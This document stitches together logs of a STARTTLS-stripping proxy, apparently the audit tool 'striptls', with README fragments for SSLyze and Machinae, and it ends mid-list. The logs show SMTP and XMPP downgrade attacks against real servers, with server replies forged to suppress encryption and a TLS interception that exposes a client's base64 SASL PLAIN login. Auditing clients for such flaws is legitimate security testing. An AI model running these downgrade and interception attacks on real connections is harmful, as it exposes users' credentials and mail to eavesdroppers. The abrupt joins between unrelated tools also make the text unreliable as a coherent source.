2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>
2016-02-02 22:12:09,759 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING  - <Session 0xffcf6e4cL> terminated.
2016-02-02 22:12:13,056 - DEBUG    - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO     - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO     - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>
2016-02-02 22:12:14,197 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING  - <Session 0xffd0918cL> terminated.
2016-02-02 22:12:16,649 - DEBUG    - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>
2016-02-02 22:12:17,760 - DEBUG    - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING  - <Session 0xffd0926cL> terminated.
2016-02-02 22:12:20,071 - DEBUG    - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>
2016-02-02 22:12:21,181 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING  - <Session 0xffd0934cL> terminated.
2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO     -  -- audit results --
2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:12:23,666 - INFO     -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>

#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities
2016-01-31 15:44:35,000 - INFO     - <Proxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-01-31 15:44:35,000 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripFromCapabilities at 0x01FE77D8>])}>
2016-01-31 15:44:37,030 - DEBUG    - <ProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-01-31 15:44:37,032 - INFO     - <Session 0x1fe6f10> client ('127.0.0.1', 20070) has connected
2016-01-31 15:44:37,032 - INFO     - <Session 0x1fe6f10> connecting to target ('mail.gmx.net', 25)
2016-01-31 15:44:39,051 - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-01-31 15:44:40,335 - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-01-31 15:44:40,746 - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-01-31 15:44:40,746 - DEBUG    - <Session 0x1fe6f10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-01-31 15:44:40,746 - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-01-31 15:44:41,292 - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '530 Authentication required\r\n'
2016-01-31 15:44:41,292 - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'rset\r\n'
2016-01-31 15:44:41,605 - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '250 OK\r\n'
2016-01-31 15:44:41,612 - WARNING  - <Session 0x1fe6f10> terminated.

#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode
2016-01-31 15:42:40,325 - INFO     - <Proxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-01-31 15:42:40,325 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripWithInvalidResponseCode at 0x02010730>])}>
2016-01-31 15:43:19,755 - DEBUG    - <ProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-01-31 15:43:19,756 - INFO     - <Session 0x1feff10> client ('127.0.0.1', 20061) has connected
2016-01-31 15:43:19,756 - INFO     - <Session 0x1feff10> connecting to target ('mail.gmx.net', 25)
2016-01-31 15:43:21,473 - DEBUG    - <Session 0x1feff10> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-01-31 15:43:22,395 - DEBUG    - <Session 0x1feff10> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-01-31 15:43:23,019 - DEBUG    - <Session 0x1feff10> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-01-31 15:43:23,019 - DEBUG    - <Session 0x1feff10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-01-31 15:43:23,035 - DEBUG    - <Session 0x1feff10> [client] => [server]          'STARTTLS\r\n'
2016-01-31 15:43:23,035 - DEBUG    - <Session 0x1feff10> [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-01-31 15:43:23,035 - DEBUG    - <Session 0x1feff10> [client] => [server][mangled] None
2016-01-31 15:43:23,035 - DEBUG    - <Session 0x1feff10> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-01-31 15:43:23,160 - DEBUG    - <Session 0x1feff10> [client] <= [server]          '530 Authentication required\r\n'
2016-01-31 15:43:23,160 - DEBUG    - <Session 0x1feff10> [client] => [server]          'rset\r\n'
2016-01-31 15:43:23,269 - DEBUG    - <Session 0x1feff10> [client] <= [server]          '250 OK\r\n'
2016-01-31 15:43:23,285 - WARNING  - <Session 0x1feff10> terminated.

#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept
2016-01-31 15:59:02,417 - INFO     - <Proxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-01-31 15:59:02,417 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.UntrustedIntercept at 0x01F45298>])}>
2016-01-31 15:59:06,292 - DEBUG    - <ProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-01-31 15:59:06,293 - INFO     - <Session 0x1f46990> client ('127.0.0.1', 20238) has connected
2016-01-31 15:59:06,293 - INFO     - <Session 0x1f46990> connecting to target ('mail.gmx.net', 25)
2016-01-31 15:59:06,561 - DEBUG    - <Session 0x1f46990> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-01-31 15:59:07,500 - DEBUG    - <Session 0x1f46990> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-01-31 15:59:07,565 - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-01-31 15:59:07,581 - DEBUG    - <Session 0x1f46990> [client] => [server]          'STARTTLS\r\n'
2016-01-31 15:59:07,581 - DEBUG    - <Session 0x1f46990> [client] <= [server][mangled] '220 Go ahead\r\n'
2016-01-31 15:59:07,832 - DEBUG    - <Session 0x1f46990> [client] <= [server][mangled] waiting for inbound SSL Handshake
2016-01-31 15:59:07,832 - DEBUG    - <Session 0x1f46990> [client] => [server]          'STARTTLS\r\n'
2016-01-31 15:59:07,926 - DEBUG    - <Session 0x1f46990> [client] => [server][mangled] performing outbound SSL handshake
2016-01-31 15:59:08,219 - DEBUG    - <Session 0x1f46990> [client] => [server][mangled] None
2016-01-31 15:59:08,219 - DEBUG    - <Session 0x1f46990> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-01-31 15:59:08,312 - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 69920427\r\n250 AUTH LOGIN PLAIN\r\n'
2016-01-31 15:59:08,312 - DEBUG    - <Session 0x1f46990> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-01-31 15:59:08,407 - DEBUG    - <Session 0x1f46990> [client] <= [server]          '530 Authentication required\r\n'
2016-01-31 15:59:08,407 - DEBUG    - <Session 0x1f46990> [client] => [server]          'rset\r\n'
2016-01-31 15:59:08,469 - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250 OK\r\n'
2016-01-31 15:59:08,484 - WARNING  - <Session 0x1f46990> terminated.

    python striptls --listen 0.0.0.0:5222 --remote jabber.ccc.de:5222 -k ../server.pem
    2016-02-05 16:53:28,842 - INFO     - <Proxy 0x7f08322ba310 listen=('0.0.0.0', 5222) target=('jabber.ccc.de', 5222)> ready.
    ...
    2016-02-05 16:53:30,401 - DEBUG    - <ProtocolDetect 0x7f083196a810 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
    ...
    2016-02-05 16:53:30,401 - INFO     - <Session 0x7f083196a7d0> client ('192.168.139.1', 56888) has connected
    2016-02-05 16:53:30,402 - INFO     - <Session 0x7f083196a7d0> connecting to target ('jabber.ccc.de', 5222)
    2016-02-05 16:53:30,923 - DEBUG    - <Session 0x7f083196a7d0> [client] => [server]          "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
    2016-02-05 16:53:30,925 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripInboundTLS new: True>
    2016-02-05 16:53:31,005 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13821701589972978594' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
    2016-02-05 16:53:31,009 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
    2016-02-05 16:53:31,012 - DEBUG    - <Session 0x7f083196a7d0> [client] => [server][mangled] "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    2016-02-05 16:53:31,069 - DEBUG    - <Session 0x7f083196a7d0> [client] => [server][mangled] performing outbound SSL handshake
    2016-02-05 16:53:31,199 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server][mangled] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>"
    2016-02-05 16:53:31,203 - DEBUG    - <Session 0x7f083196a7d0> [client] => [server]          "<iq type='get' id='purple9f914f80'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>"
    2016-02-05 16:53:31,259 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13515446948282835507' from='jabber.ccc.de' xml:lang='en'>"
    2016-02-05 16:53:31,263 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          "<stream:error><invalid-namespace xmlns='urn:ietf:params:xml:ns:xmpp-streams'></invalid-namespace></stream:error>"
    2016-02-05 16:53:31,266 - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          '</stream:stream>'
    2016-02-05 16:53:31,269 - WARNING  - <Session 0x7f083196a7d0> terminated.

    2016-02-05 16:53:34,633 - DEBUG    - <ProtocolDetect 0x7f083196a990 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
    2016-02-05 16:53:34,633 - INFO     - <Session 0x7f083196a910> client ('192.168.139.1', 56890) has connected
    2016-02-05 16:53:34,633 - INFO     - <Session 0x7f083196a910> connecting to target ('jabber.ccc.de', 5222)
    2016-02-05 16:53:34,741 - DEBUG    - <Session 0x7f083196a910> [client] => [server]          "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
    2016-02-05 16:53:34,742 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>
    2016-02-05 16:53:34,810 - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='12381525525258986322' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
    2016-02-05 16:53:34,814 - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
    2016-02-05 16:53:34,816 - DEBUG    - <Session 0x7f083196a910> [client] <= [server][mangled] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>"
    2016-02-05 16:53:34,869 - DEBUG    - <Session 0x7f083196a910> [client] => [server]          "<iq type='get' id='purplecfe2ee07'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>"
    2016-02-05 16:53:34,920 - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          "<stream:error><policy-violation xmlns='urn:ietf:params:xml:ns:xmpp-streams'></policy-violation><text xml:lang='' xmlns='urn:ietf:params:xml:ns:xmpp-streams'>Use of STARTTLS required</text></stream:error></stream:stream>"
    2016-02-05 16:53:34,926 - WARNING  - <Session 0x7f083196a910> terminated.

    2016-02-05 16:53:42,799 - DEBUG    - <ProtocolDetect 0x7f083196aa90 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
    2016-02-05 16:53:42,799 - INFO     - <Session 0x7f083196a8d0> client ('192.168.139.1', 56892) has connected
    2016-02-05 16:53:42,799 - INFO     - <Session 0x7f083196a8d0> connecting to target ('jabber.ccc.de', 5222)
    2016-02-05 16:53:42,901 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
    2016-02-05 16:53:42,903 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.UntrustedIntercept new: True>
    2016-02-05 16:53:42,980 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='10051743579572304948' from='jabber.ccc.de' version='1.0' xml:lang='en'><stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
    2016-02-05 16:53:42,984 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    2016-02-05 16:53:42,986 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server][mangled] "<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    2016-02-05 16:53:43,006 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server][mangled] waiting for inbound SSL Handshake
    2016-02-05 16:53:43,008 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    2016-02-05 16:53:43,060 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server][mangled] performing outbound SSL handshake
    2016-02-05 16:53:43,219 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server][mangled] None
    2016-02-05 16:53:43,221 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'
    2016-02-05 16:53:43,225 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          "stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
    2016-02-05 16:53:43,369 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='6938642107398534259' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
    2016-02-05 16:53:43,379 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><register xmlns='http://jabber.org/features/iq-register'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism><mechanism>X-OAUTH2</mechanism><mechanism>SCRAM-SHA-1</mechanism></mechanisms></stream:features>"
    2016-02-05 16:53:43,423 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'
    2016-02-05 16:53:43,426 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          "auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN' xmlns:ga='http://www.google.com/talk/protocol/auth' ga:client-uses-full-bind-result='true'>AHRpbgB4eA==</auth>"
    2016-02-05 16:53:43,581 - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          "<failure xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><not-authorized/></failure>"
    2016-02-05 16:53:43,611 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'
    2016-02-05 16:53:43,616 - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '/stream:stream>'
    2016-02-05 16:53:43,620 - WARNING  - <Session 0x7f083196a8d0> terminated.

    2016-02-05 16:53:46,352 - WARNING  - Ctrl C - Stopping server
    2016-02-05 16:53:46,353 - INFO     -  -- audit results --
    2016-02-05 16:53:46,353 - INFO     - [*] client: 192.168.139.1
    2016-02-05 16:53:46,353 - INFO     -     [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
    2016-02-05 16:53:46,353 - INFO     -     [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
    2016-02-05 16:53:46,353 - INFO     -     [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>

• Multi-processed and multi-threaded scanning: it's very fast.
• Support for all SSL protocols, from SSL 2.0 to TLS 1.2.
• NEW: SSLyze can also be used as a library, in order to run scans and process the results directly from Python.
• Performance testing: session resumption and TLS tickets support.
• Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more.
• Server certificate validation and revocation checking through OCSP stapling.
• Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.
• Support for client certificates when scanning servers that perform mutual authentication.
• Scan results can be written to an XML or JSON file for further processing.
• And much more !

pip install sslyze

git clone https://github.com/nabla-c0d3/sslyze.git
cd sslyze
pip install -r requirements.txt --target ./lib

python sslyze_cli.py --regular www.yahoo.com:443 www.google.com

# Script to get the list of SSLv3 cipher suites supported by smtp.gmail.com
hostname = 'smtp.gmail.com'
try:
    # First we must ensure that the server is reachable
    server_info = ServerConnectivityInfo(hostname=hostname, port=587,
                                         tls_wrapped_protocol=TlsWrappedProtocolEnum.STARTTLS_SMTP)
    server_info.test_connectivity_to_server()
except ServerConnectivityError as e:
    raise RuntimeError('Error when connecting to {}: {}'.format(hostname, e.error_msg))

# Get the list of available plugins
sslyze_plugins = PluginsFinder()

# Create a process pool to run scanning commands concurrently
plugins_process_pool = PluginsProcessPool(sslyze_plugins)

# Queue a scan command to get the server's certificate
plugins_process_pool.queue_plugin_task(server_info, 'sslv3')

# Process the result and print the certificate CN
for plugin_result in plugins_process_pool.get_results():
    if plugin_result.plugin_command == 'sslv3':
        # Do something with the result
        print 'SSLV3 cipher suites'
        for cipher in plugin_result.accepted_cipher_list:
            print '    {}'.format(cipher.name)

python.exe setup_py2exe.py py2exe

1. Codebase - Bring Automater to python3 compatibility while making the code more pythonic
2. Configuration - Use a more human readable configuration format (YAML)
3. Inputs - Support JSON parsing out-of-the-box without the need to write regular expressions, but still support regex scraping when needed
4. Outputs - Support additional output types, including JSON, while making extraneous output optional

pip3 install machinae

pip3 install git+https://github.com/HurricaneLabs/machinae.git

fortinet_classify:
  default: true

vt_ip:
  default: false
vt_domain:
  default: false

usage: machinae [-h] [-c CONFIG] [-d DELAY] [-f FILE] [--nomerge] [-o {D,J,N}]
                [-O {ipv4,ipv6,fqdn,email,sslfp,hash,url}] [-q] [-s SITES]
                targets [targets ...]

• See above for details on the -c / --config and --nomerge options.
  
• Machinae supports a -d / --delay option, like Automater. However, Machinae uses 0 by default.
  
• Machinae output is controlled by two arguments:
  
  • -o controls the output format, and can be followed by a single character to indicated the desired type of output:
    • N is the default output ("Normal")
    • D is the default output, but dot characters are replaced
    • J is JSON output
  • -f / --file specifies the file where output should be written. The default is "-" for stdout.
• Machinae will attempt to auto-detect the type of target passed in (Machinae refers to targets as "observables" and the type as "otype"). This detection can be overridden with the -O / --otype option. The choices are listed in the usage
  
• By default, Machinae operates in verbose mode. In this mode, it will output status information about the services it is querying on the console as they are queried. This output will always be written to stdout, regardless of the output setting. To disable verbose mode, use -q
  
• By default, Machinae will run through all services in the configuration that apply to each target's otype and are not marked as "default: false". To modify this behavior, you can:
  
  • Pass a comma separated list of sites to run (use the top level key from the configuration).
  • Pass the special keyword all to run through all services including those marked as "default: false"
  Note that in both cases, otype validation is still applied.
  
• Lastly, a list of targets should be passed. All arguments other than the options listed above will be interpreted as targets.
  

• IPVoid
• URLVoid
• URL Unshortener ( http://www.toolsvoid.com/unshorten-url )
• Malc0de
• SANS
• Telize GeoIP
• Fortinet Category
• VirusTotal pDNS (via web scrape - commented out)
• VirusTotal pDNS (via JSON API)
• VirusTotal URL Report (via JSON API)
• VirusTotal File Report (via JSON API)
• Reputation Authority
• ThreatExpert
• VxVault
• ProjectHoneypot
• McAfee Threat Intelligence
• StopForumSpam
• Cymru MHR
• ICSI Certificate Notary
• TotalHash (disabled by default)
• DomainTools Parsed Whois (Requires API key)
• DomainTools Reverse Whois (Requires API key)
• DomainTools Reputation
• IP WHOIS (Using RIR REST interfaces)

• Fortinet Category ( fortinet_classify )
• TotalHash ( totalhash_ip )
• DomainTools Parsed Whois ( domaintools_parsed_whois )
• DomainTools Reverse Whois ( domaintools_reverse_whois )
• DomainTools Reputation ( domaintools_reputation )

• Some ISP's on IPvoid contain double-encoded HTML entities, which are not double-decoded

• Add IDS rule search functionality (VRT/ET)
• Add "More info" link for sites
• Add "dedup" option to parser settings
• Add option for per-otype request settings
• Add custom per-site output for error codes

• New features
  • Support for sites returning multiple JSON documents
  • Ability to specify time format for relative time parameters
  • Ability to parse Unix timestamps in results and display in ISO-8601 format
  • Ability to specify status codes to ignore per-API
• New sites
  • DNSDB - FarSight Security Passive DNS Data base (premium)

• New sites
  • Telize (premium) - GeoIP site (premium)
  • Freegeoip - GeoIP site (free)
  • CIF - CIFv2 API support, from csirtgadgets.org
• New features
